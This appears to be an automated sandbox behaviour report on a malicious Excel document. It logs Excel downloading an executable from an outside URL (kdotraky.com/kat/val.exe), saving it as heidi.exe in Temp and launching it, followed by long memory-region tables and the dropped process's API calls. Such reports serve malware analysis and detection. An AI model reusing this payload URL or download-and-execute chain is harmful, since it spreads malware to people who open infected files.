c:\users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\index.dat 48.00 KB (49152 bytes) MD5: ef02ff50bdc43aeed96d1da34418794b
SHA1: fc6b4901d1575a9c013db2d9e2f3932d8a86b35f
SHA256: 4e6dccaa3e91b08212ec5adef0881a0f13b739e8811d13a8bb75df85e2ee54c0
False
Threads
Thread 0x934
(Host: 25, Network: 1)
+
Category Operation Information Success Count Logfile
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\excel.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1
Fn
Keyboard Read virtual_key_code = VK_ESCAPE, result_out = 0 True 56
Fn
System Get Time type = Local Time, time = 2018-02-14 02:17:01 (Local Time) True 1
Fn
Keyboard Read virtual_key_code = VK_ESCAPE, result_out = 0 True 3
Fn
System Get Time type = Local Time, time = 2018-02-14 02:17:01 (Local Time) True 1
Fn
Keyboard Read virtual_key_code = VK_ESCAPE, result_out = 0 True 2
Fn
System Get Time type = Local Time, time = 2018-02-14 02:17:01 (Local Time) True 1
Fn
Keyboard Read virtual_key_code = VK_ESCAPE, result_out = 0 True 3
Fn
System Get Time type = Local Time, time = 2018-02-14 02:17:01 (Local Time) True 1
Fn
Keyboard Read virtual_key_code = VK_ESCAPE, result_out = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-02-14 02:17:01 (Local Time) True 1
Fn
Keyboard Read virtual_key_code = VK_ESCAPE, result_out = 0 True 5
Fn
Module Get Address module_name = Unknown module name, function = HeapCreate, address_out = 0x76e04a2d True 1
Fn
Module Get Address module_name = Unknown module name, function = HeapAlloc, address_out = 0x77b8e026 True 1
Fn
Module Get Address module_name = Unknown module name, function = RtlMoveMemory, address_out = 0x77bc3c40 True 1
Fn
Module Get Address module_name = Unknown module name, function = EnumPropsA, address_out = 0x7598863e True 1
Fn
Module Get Address module_name = Unknown module name, function = ExitProcess, address_out = 0x76e07a10 True 1
Fn
Module Load module_name = Urlmon, base_address = 0x77170000 True 1
Fn
Module Get Address module_name = Unknown module name, function = URLDownloadToFileW, address_out = 0x772066f6 True 1
Fn
Module Load module_name = Shell32, base_address = 0x76100000 True 1
Fn
Module Get Address module_name = Unknown module name, function = ShellExecuteW, address_out = 0x76113c71 True 1
Fn
Module Get Address module_name = Unknown module name, function = ExpandEnvironmentStringsW, address_out = 0x76e04173 True 1
Fn
URL Download url = http://kdotraky.com/kat/val.exe, filename = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, show_window = SW_SHOWNORMAL True 1
Fn
Process #3: heidi.exe
(Host: 360, Network: 0)
+
Information Value
ID #3
File Name c:\users\kft6utqw\appdata\local\temp\heidi.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:03, Reason: Child Process
Unmonitor End Time: 00:03:39, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
+
Information Value
PID 0xa3c
Parent PID 0x930 (c:\program files (x86)\microsoft office\office12\excel.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Groups
  • XABNCPUWKW\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000de82 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A40
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True True False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory Readable, Writable, Executable True True False
pagefile_0x00000000001b0000 0x001b0000 0x001b6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001d0000 0x001d0000 0x0024ffff Private Memory Readable, Writable True True False
private_0x0000000000250000 0x00250000 0x00250fff Private Memory Readable, Writable True True False
private_0x0000000000260000 0x00260000 0x00260fff Private Memory Readable, Writable, Executable True True False
private_0x0000000000270000 0x00270000 0x0027ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000270000 0x00270000 0x00276fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000270000 0x00270000 0x00270fff Private Memory Readable, Writable True True False
private_0x0000000000280000 0x00280000 0x0037ffff Private Memory Readable, Writable True True False
locale.nls 0x00380000 0x003e6fff Memory Mapped File Readable False False False
pagefile_0x00000000003f0000 0x003f0000 0x003f6fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True True False
heidi.exe 0x00400000 0x004b8fff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x00000000004c0000 0x004c0000 0x00647fff Pagefile Backed Memory Readable True False False
private_0x0000000000650000 0x00650000 0x00660fff Private Memory Readable, Writable True True False
private_0x0000000000670000 0x00670000 0x006acfff Private Memory Readable, Writable True True False
private_0x00000000006b0000 0x006b0000 0x006bffff Private Memory Readable, Writable True True False
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000850000 0x00850000 0x01c4ffff Pagefile Backed Memory Readable True False False
private_0x0000000001ce0000 0x01ce0000 0x01ceffff Private Memory Readable, Writable True True False
private_0x0000000001cf0000 0x01cf0000 0x01deffff Private Memory - True True False
private_0x0000000001df0000 0x01df0000 0x01feffff Private Memory Readable, Writable True True False
pagefile_0x0000000001df0000 0x01df0000 0x01ecefff Pagefile Backed Memory Readable True False False
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable True True False
private_0x0000000001ff0000 0x01ff0000 0x0215ffff Private Memory Readable, Writable True True False
staticcache.dat 0x02160000 0x02a8ffff Memory Mapped File Readable False False False
pagefile_0x0000000002a90000 0x02a90000 0x02e82fff Pagefile Backed Memory Readable True False False
comctl32.dll 0x73af0000 0x73b73fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74ae0000 0x74ae8fff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x74e40000 0x74e52fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74e60000 0x74edffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x74ef0000 0x74ef7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74f00000 0x74f5bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74f60000 0x74f9efff Memory Mapped File Readable, Writable, Executable False False False
olepro32.dll 0x75270000 0x75288fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x756b0000 0x756bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x756c0000 0x7571ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75720000 0x757ebfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x757f0000 0x7587efff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75930000 0x75a2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75a60000 0x75abffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75e10000 0x75f6bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76010000 0x760fffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76100000 0x76d49fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76d50000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76df0000 0x76efffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76f00000 0x76f09fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76f10000 0x76f66fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77330000 0x773cffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x773d0000 0x77415fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x77420000 0x774affff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x774b0000 0x7755bfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x77700000 0x77718fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077760000 0x77760000 0x77859fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077860000 0x77860000 0x7797efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77980000 0x77b28fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77b60000 0x77cdffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 4 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0xa40
(Host: 122, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, base_address = 0x400000 True 1
Fn
Keyboard Get Info type = 0, result_out = 4 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename module_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 261 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 261 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Borland\Locales False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales False 1
Fn
Module Load module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.ENU, base_address = 0x0 False 1
Fn
Module Load module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.EN, base_address = 0x0 False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76df0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x76e8434f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x757f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x757f4c28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7586c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7586ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75815934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7586d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7586dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7586e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7586f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7586f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75815a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7586ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7586ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7580b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x75806fab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x758101a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7580699e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x75816ba7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x75836c12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7580dbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x75817fdc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x75807a2a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x75810355 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75930000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x75954413 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x75947d2f True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
